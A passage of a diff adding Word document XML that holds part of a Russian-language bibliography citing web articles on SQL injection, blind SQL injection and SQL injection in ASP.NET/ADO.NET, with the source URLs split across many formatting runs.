+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-инъекции: http://www.ibm.com/developerworks/ru/. -</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2014. -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">:  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>://</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>www</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ibm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>developerworks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>library</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>se</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>attacks</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">слепые </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>иънекции</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>://</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>programguru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/. – 2014. – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>://</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>programguru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1%81%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1%82%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>8/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>slepye</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>inekcii</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ADO</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> | </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-инъекции: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>://</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>professorweb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/. -2015. -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">:  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>://</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
